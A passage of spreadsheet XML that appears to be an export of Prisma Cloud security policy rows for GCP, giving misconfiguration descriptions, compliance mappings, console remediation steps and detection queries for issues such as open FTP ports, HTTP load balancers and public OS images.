          <t>49a154e8-6049-4317-bbb5-0c90cb078f94</t>
        </is>
      </c>
      <c r="AI2725" t="inlineStr">
        <is>
          <t>49a154e8-6049-4317-bbb5-0c90cb078f94</t>
        </is>
      </c>
      <c r="AJ2725" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2725" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2726">
      <c r="A2726" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, APRA (CPS 234) Information Security, NIST 800-53 Rev4, HIPAA, New Zealand Information Security Manual (NZISM v3.4), MITRE ATT&amp;CK v8.2 [Deprecated], CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, GDPR, APRA (CPS 234) Information Security, CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST CSF v2.0, NIST 800-53 Rev4, TX-RAMP Level 1, NIST 800-53 Rev 5, PCI DSS v3.2.1, Telecommunications Security Act - TSA, SOC 2, ISO 27001:2013, NIST SP 800-172, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), MPAA Content Protection Best Practices, NIST CSF, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2024.2, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, MITRE ATT&amp;CK v6.3 [Deprecated], jbrox - GDPR, ISO 27001:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), MPAA Content Protection Best Practices, NIST CSF, jbrox - GDPR, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CSA CCM v3.0.1, NIST SP 800-171 Revision 3, ITSG-33, Copy of New Zealand Information Security Manual (NZISM v3.4), Cybersecurity Maturity Model Certification (CMMC) v.1.02, CRI Profile v2.0, GDPR, SOC 2, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v3.0.1, CCPA 2018, PIPEDA, NIST CSF, Brazilian Data Protection Law (LGPD), TX-RAMP Level 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v3.0.1, NIST SP 800-171 Revision 2, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2726" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2726" s="2" t="inlineStr"/>
      <c r="D2726" t="inlineStr"/>
      <c r="E2726" t="inlineStr"/>
      <c r="F2726" t="inlineStr"/>
      <c r="G2726" t="b">
        <v>1</v>
      </c>
      <c r="H27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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2726" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2726" t="inlineStr">
        <is>
          <t>GCP Firewall rule allows all traffic on FTP port (21)</t>
        </is>
      </c>
      <c r="L2726" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2726" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2726" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2726" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2726" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2726" t="inlineStr">
        <is>
          <t>19</t>
        </is>
      </c>
      <c r="R2726" t="inlineStr">
        <is>
          <t>19.1</t>
        </is>
      </c>
      <c r="S2726" t="inlineStr">
        <is>
          <t>GCP,Policy Status Review</t>
        </is>
      </c>
      <c r="T2726" t="b">
        <v>1</v>
      </c>
      <c r="U2726" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2726" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2726" t="inlineStr">
        <is>
          <t>This policy identifies GCP Firewall rules which allow all inbound traffic on FTP port (21). Allowing access from arbitrary IP addresses to this port increases the attack surface of your network. It is recommended that the FTP port (21) should be allowed to specific IP addresses.</t>
        </is>
      </c>
      <c r="X2726" t="inlineStr">
        <is>
          <t>If the Firewall rule reported indeed needs to restrict all traffic, follow the instructions below:
1. Login to GCP Console
2. Go to 'VPC Network'
3. Go to the 'Firewall'
4. Click on the reported Firewall rule
5. Click on 'EDIT'
6. Modify Source IP ranges to specific IP
7. Click on 'SAVE'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-ftp-access
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-ftp-access</t>
        </is>
      </c>
      <c r="Y2726" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable this firewall rule blocking internet traffic to FTP port (21).",
'impact': 'Disable GCP firewall rule which allows all traffic on FTP port (21)',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2726" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-firewall-rules-list' AND json.rule = disabled is false and direction equals INGRESS and (sourceRanges[*] equals ::0 or sourceRanges[*] equals 0.0.0.0 or sourceRanges[*] equals 0.0.0.0/0 or sourceRanges[*] equals ::/0 or sourceRanges[*] equals ::) and allowed[?any(ports contains _Port.inRange(21,21) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp)))] exists
{"category":"Networking","resourceTypes":["google_compute_firewall"]}</t>
        </is>
      </c>
      <c r="AA2726" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2726" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2726" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-72-CKV_GCP_75</t>
        </is>
      </c>
      <c r="AD2726" t="b">
        <v>1</v>
      </c>
      <c r="AE2726" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2726" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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6" t="inlineStr">
        <is>
          <t>fab6a8ee-dc82-49f0-8c2c-a2a5c7666539</t>
        </is>
      </c>
      <c r="AI2726" t="inlineStr">
        <is>
          <t>fab6a8ee-dc82-49f0-8c2c-a2a5c7666539</t>
        </is>
      </c>
      <c r="AJ2726" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2726" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2727">
      <c r="A2727" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2727" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2727" s="2" t="inlineStr"/>
      <c r="D2727" t="inlineStr"/>
      <c r="E2727" t="inlineStr"/>
      <c r="F2727" t="inlineStr"/>
      <c r="G2727" t="b">
        <v>1</v>
      </c>
      <c r="H27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27" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2727" t="inlineStr">
        <is>
          <t>gcloud-compute</t>
        </is>
      </c>
      <c r="K2727" t="inlineStr">
        <is>
          <t>GCP public-facing (external) global load balancer using HTTP protocol</t>
        </is>
      </c>
      <c r="L2727" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2727" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2727" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2727" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2727" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2727" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2727" t="inlineStr">
        <is>
          <t>Transmission Confidentiality and Integrity | Cryptographic Protection</t>
        </is>
      </c>
      <c r="S2727" t="inlineStr"/>
      <c r="T2727" t="b">
        <v>0</v>
      </c>
      <c r="U2727" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2727" t="inlineStr">
        <is>
          <t>gcloud-compute-global-forwarding-rule</t>
        </is>
      </c>
      <c r="W2727" t="inlineStr">
        <is>
          <t>This policy identifies GCP public-facing (external) global load balancers that are using HTTP protocol.
Using the HTTP protocol with a GCP external load balancer transmits data in plaintext, making it vulnerable to eavesdropping, interception, and modification by malicious actors. This lack of encryption exposes sensitive information, increases the risk of man-in-the-middle attacks, and compromises the overall security and privacy of the data exchanged between clients and servers.
It is recommended to use HTTPS protocol with external-facing load balancers.</t>
        </is>
      </c>
      <c r="X2727" t="inlineStr">
        <is>
          <t>1. Login to the GCP console
2. Navigate to 'Network Service' and then 'Load Balancing'
3. Click on the 'FRONTENDS' tab
4. Identify the frontend that is using the reported forwarding rule.
5. Click on the load balancer name associated with the frontend identified above
6. Click 'Edit'
7. Go to 'Frontend configuration'
8. Delete the frontend rule that allows HTTP protocol.
9. Add new frontend rule(s) as required. Make sure to use HTTPS protocol instead of HTTP for new rules.
10. Click 'Update'
11. Click 'UPDATE LOAD BALANCER' in the pop-up.</t>
        </is>
      </c>
      <c r="Y2727" t="inlineStr"/>
      <c r="Z2727" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-global-forwarding-rule' AND json.rule = globalForwardingRules[?any( target contains "/targetHttpProxies/" and loadBalancingScheme contains "EXTERNAL" )] exists</t>
        </is>
      </c>
      <c r="AA2727" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2727" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2727" t="inlineStr">
        <is>
          <t>PC-GCP-LB-1269</t>
        </is>
      </c>
      <c r="AD2727" t="b">
        <v>1</v>
      </c>
      <c r="AE2727" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2727" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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27" t="inlineStr">
        <is>
          <t>8e46318c-34c8-4751-86e8-86b7dd971e07</t>
        </is>
      </c>
      <c r="AI2727" t="inlineStr">
        <is>
          <t>2e0deaf8-9a21-4203-a82c-7874e0ce13db</t>
        </is>
      </c>
      <c r="AJ2727" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2727" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2728">
      <c r="A2728" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2728" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2728" s="2" t="inlineStr"/>
      <c r="D2728" t="inlineStr"/>
      <c r="E2728" t="inlineStr"/>
      <c r="F2728" t="inlineStr"/>
      <c r="G2728" t="b">
        <v>1</v>
      </c>
      <c r="H27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28" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2728" t="inlineStr">
        <is>
          <t>gcloud-compute</t>
        </is>
      </c>
      <c r="K2728" t="inlineStr">
        <is>
          <t>GCP OS Image is publicly accessible</t>
        </is>
      </c>
      <c r="L2728" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2728" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2728" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2728" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2728" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2728" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R2728" t="inlineStr">
        <is>
          <t>Access Enforcement</t>
        </is>
      </c>
      <c r="S2728" t="inlineStr"/>
      <c r="T2728" t="b">
        <v>0</v>
      </c>
      <c r="U2728" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2728" t="inlineStr">
        <is>
          <t>gcloud-compute-image</t>
        </is>
      </c>
      <c r="W2728" t="inlineStr">
        <is>
          <t>This policy identifies GCP OS Images that are publicly accessible.
Custom GCP OS images are user-created operating system images tailored to specific needs and configurations. Making these images public can expose sensitive data, proprietary software, and security vulnerabilities. This can lead to unauthorized access, data breaches, and system exploitation, compromising your infrastructure's security and integrity.
It is recommended to keep OS images private unless required for organizational needs.</t>
        </is>
      </c>
      <c r="X2728" t="inlineStr">
        <is>
          <t>It is recommended to review and add appropriate, but restrictive roles before revoking access.
To revoke access from 'allAuthenticatedUsers', follow the below mentioned steps:
1. Login to the GCP console
2. Navigate to 'Compute Engine' and then 'Images'
4. Select the reported image using the check box
5. Click on the 'PERMISSIONS' tab in the right bar
6. Filter for 'allAuthenticatedUsers'
7. Click on the 'Remove principal' button (bin icon)
8. Select 'Remove allAuthenticatedUsers from all roles on this resource. They may still have access via inherited roles.'
9. Click 'Remove'</t>
        </is>
      </c>
      <c r="Y2728" t="inlineStr"/>
      <c r="Z2728" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-image' AND json.rule = iamPolicy.bindings[?any( members contains "allAuthenticatedUsers" )] exists</t>
        </is>
      </c>
      <c r="AA2728" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2728" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2728" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-1267</t>
        </is>
      </c>
      <c r="AD2728" t="b">
        <v>1</v>
      </c>
      <c r="AE2728" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2728" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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28" t="inlineStr">
        <is>
          <t>bb8035c0-c0ac-4771-bb06-e5962993fb0a</t>
        </is>
      </c>
      <c r="AI2728" t="inlineStr">
        <is>
          <t>af9af69f-02fb-43d2-9931-9ab2b498448f</t>
        </is>
      </c>
      <c r="AJ2728" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2728" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2729">
      <c r="A2729" t="inlineStr">
        <is>
          <t>Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, New Zealand Information Security Manual (NZISM v3.4), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), FFIEC, CRI Profile v1.2.1, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Secure Controls Framework (SCF) - 2024.2, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, CIS Controls v8, FFIEC, CIS Controls v8.1, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS Controls v7.1, CIS Controls v8.1, CIS Controls v8, ISO/IEC 27001:2022, Copy of CIS Controls v8, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), FFIEC, ISO 27002:2022, PCI DSS v4.0, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2729" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2729" s="2" t="inlineStr"/>
      <c r="D2729" t="inlineStr"/>
      <c r="E2729" t="inlineStr"/>
      <c r="F2729" t="inlineStr"/>
      <c r="G2729" t="b">
        <v>0</v>
      </c>
      <c r="H27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29" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2729" t="inlineStr">
        <is>
          <t>gcloud-compute-instance</t>
        </is>
      </c>
      <c r="K2729" t="inlineStr">
        <is>
          <t>GCP VM instance template with IP forwarding enabled</t>
        </is>
      </c>
      <c r="L2729" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2729" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2729" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2729" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2729" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2729" t="inlineStr">
        <is>
          <t>CIS Control 4</t>
        </is>
      </c>
      <c r="R2729" t="inlineStr">
        <is>
          <t>4.5</t>
        </is>
      </c>
      <c r="S2729" t="inlineStr"/>
      <c r="T2729" t="b">
        <v>0</v>
      </c>
      <c r="U2729" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2729" t="inlineStr">
        <is>
          <t>gcloud-compute-instance-template</t>
        </is>
      </c>
      <c r="W2729" t="inlineStr">
        <is>
          <t>This policy identifies VM instance templates that have IP forwarding enabled. IP Forwarding could open unintended and undesirable communication paths and allows VM instances to send and receive packets with the non-matching destination or source IPs. To enable source and destination IP match check, disable the IP Forwarding.</t>
        </is>
      </c>
      <c r="X2729" t="inlineStr">
        <is>
          <t>GCP VM instance templates are used to create VM instances based on a preexisting configuration. GCP VM instance templates IP forwarding feature cannot be updated. After an instance template is created, the IP forwarding field becomes read-only. So to fix this alert, Create a new VM instance template with IP forwarding disabled, migrate all required data from the reported template to the newly created one, and delete the reported VM instance template.
To create a new VM Instance template with IP forwarding disabled:
1. Login to GCP Portal
2. Go to 'Computer Engine' (Left Panel)
3. Go to 'Instance templates'
4. Click on 'CREATE INSTANCE TEMPLATE'
5. Specify the mandatory parameters as required
6. Click 'Management, security, disk, networking, sole tenancy'
7. Click 'Networking'
8. Click on the specific Network interfaces
9. Set 'IP forwarding' to 'Off'
10. Click on 'Create' button
To Delete VM instance template which has IP forwarding enabled:
1. Login to GCP Portal
2. Go to Computer Engine (Left Panel)
3. Go to 'Instance templates'
4. From the list, choose the reported templates
5. Click on the 'Delete' button</t>
        </is>
      </c>
      <c r="Y2729" t="inlineStr"/>
      <c r="Z2729" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-instance-template' AND json.rule = properties.canIpForward is true and (name does not start with "gke-" or (name starts with "gke-" and properties.disks[*].initializeParams.labels does not exist) )</t>
        </is>
      </c>
      <c r="AA2729" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2729" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2729" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-712</t>
        </is>
      </c>
      <c r="AD2729" t="b">
        <v>1</v>
      </c>
      <c r="AE2729" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2729" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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29" t="inlineStr">
        <is>
          <t>68bd1715-36a0-4870-b0d5-96dd719a20e2</t>
        </is>
      </c>
      <c r="AI2729" t="inlineStr">
        <is>
          <t>ab053840-53eb-499d-bf22-d58e375c490a</t>
        </is>
      </c>
      <c r="AJ2729" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2729" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2730">
      <c r="A2730" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B2730" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2730" s="2" t="inlineStr"/>
      <c r="D2730" t="n">
        <v>0</v>
      </c>
      <c r="E2730" t="n">
        <v>236</v>
      </c>
      <c r="F2730" t="n">
        <v>0</v>
      </c>
      <c r="G2730" t="b">
        <v>1</v>
      </c>
      <c r="H27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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2730" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2730" t="inlineStr">
        <is>
          <t>GCP VM - 45 Days -  Owned</t>
        </is>
      </c>
      <c r="L2730" t="inlineStr"/>
      <c r="M2730" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2730" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2730" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2730" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2730" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R2730" t="inlineStr">
        <is>
          <t>5.1.2 Config - Stale Compute Resources</t>
        </is>
      </c>
      <c r="S2730" t="inlineStr"/>
      <c r="T2730" t="b">
        <v>0</v>
      </c>
      <c r="U2730" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2730" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2730" t="inlineStr"/>
      <c r="X2730" t="inlineStr"/>
      <c r="Y2730" t="inlineStr"/>
      <c r="Z2730" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-compute-instances-list' AND json.rule = "_DateTime.ageInDays(creationTimestamp) &gt; 45 and labels.owner exists and status does not equal TERMINATED" addcolumn creationTimestamp labels.owner</t>
        </is>
      </c>
      <c r="AA2730" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2730" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2730" t="inlineStr"/>
      <c r="AD2730" t="b">
        <v>0</v>
      </c>
      <c r="AE2730" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2730" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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0" t="inlineStr">
        <is>
          <t>c937a303-70f6-40c7-b790-c44a3249aa08</t>
        </is>
      </c>
      <c r="AI2730" t="inlineStr">
        <is>
          <t>a4e64f9d-83de-48ee-9c01-3dd1df85cc4e</t>
        </is>
      </c>
      <c r="AJ2730" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2730" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2731">
      <c r="A2731" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B2731" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2731" s="2" t="inlineStr"/>
      <c r="D2731" t="n">
        <v>0</v>
      </c>
      <c r="E2731" t="n">
        <v>129</v>
      </c>
      <c r="F2731" t="n">
        <v>0</v>
      </c>
      <c r="G2731" t="b">
        <v>1</v>
      </c>
      <c r="H27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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2731" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2731" t="inlineStr">
        <is>
          <t>GCP VM - 7 Days -  No Owner</t>
        </is>
      </c>
      <c r="L2731" t="inlineStr"/>
      <c r="M2731" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2731" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2731" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2731" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2731" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R2731" t="inlineStr">
        <is>
          <t>5.1.3 Config - Compute Resource with No Owner</t>
        </is>
      </c>
      <c r="S2731" t="inlineStr">
        <is>
          <t>ADAM2,NOTADAM,NEWONE</t>
        </is>
      </c>
      <c r="T2731" t="b">
        <v>0</v>
      </c>
      <c r="U2731" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2731" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2731" t="inlineStr"/>
      <c r="X2731" t="inlineStr"/>
      <c r="Y2731" t="inlineStr"/>
      <c r="Z2731" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-compute-instances-list' AND resource.status = Active AND json.rule = "_DateTime.ageInDays(creationTimestamp) &gt; 7 and labels.owner does not exist and status does not equal TERMINATED" addcolumn creationTimestamp labels.owner status</t>
        </is>
      </c>
      <c r="AA2731" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2731" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2731" t="inlineStr"/>
      <c r="AD2731" t="b">
        <v>0</v>
      </c>
      <c r="AE2731" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2731" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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1" t="inlineStr">
        <is>
          <t>591a6c27-6271-4fa0-815f-ddd6ee529e4f</t>
        </is>
      </c>
      <c r="AI2731" t="inlineStr">
        <is>
          <t>510d963a-2929-4e1e-a1e6-e4ed3c16880b</t>
        </is>
      </c>
      <c r="AJ2731" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2731" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2732">
      <c r="A2732" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B2732" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2732" s="2" t="inlineStr"/>
      <c r="D2732" t="n">
        <v>33</v>
      </c>
      <c r="E2732" t="n">
        <v>129</v>
      </c>
      <c r="F2732" t="n">
        <v>0</v>
      </c>
      <c r="G2732" t="b">
        <v>1</v>
      </c>
      <c r="H2732"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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2732" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2732" t="inlineStr">
        <is>
          <t>GCP VM - 3 Days -  No Owner</t>
        </is>
      </c>
      <c r="L2732" t="inlineStr"/>
      <c r="M2732" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2732" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2732" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2732" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2732" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R2732" t="inlineStr">
        <is>
          <t>5.1.3 Config - Compute Resource with No Owner</t>
        </is>
      </c>
      <c r="S2732" t="inlineStr"/>
      <c r="T2732" t="b">
        <v>0</v>
      </c>
      <c r="U2732" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2732" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2732" t="inlineStr"/>
      <c r="X2732" t="inlineStr"/>
      <c r="Y2732" t="inlineStr"/>
      <c r="Z2732" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-compute-instances-list' AND resource.status = Active AND json.rule = "_DateTime.ageInDays(creationTimestamp) &gt; 3 and labels.owner does not exist and labels.Owner does not exist and status does not equal TERMINATED" addcolumn creationTimestamp labels.owner status</t>
        </is>
      </c>
      <c r="AA2732" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2732" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2732" t="inlineStr"/>
      <c r="AD2732" t="b">
        <v>0</v>
      </c>
      <c r="AE2732" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2732" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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2" t="inlineStr">
        <is>
          <t>e1d0f524-9ec3-4ebd-b700-6bafd7c46852</t>
        </is>
      </c>
      <c r="AI2732" t="inlineStr">
        <is>
          <t>ec333cbf-b976-4832-aec6-1a872e9ac68c</t>
        </is>
      </c>
      <c r="AJ2732" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
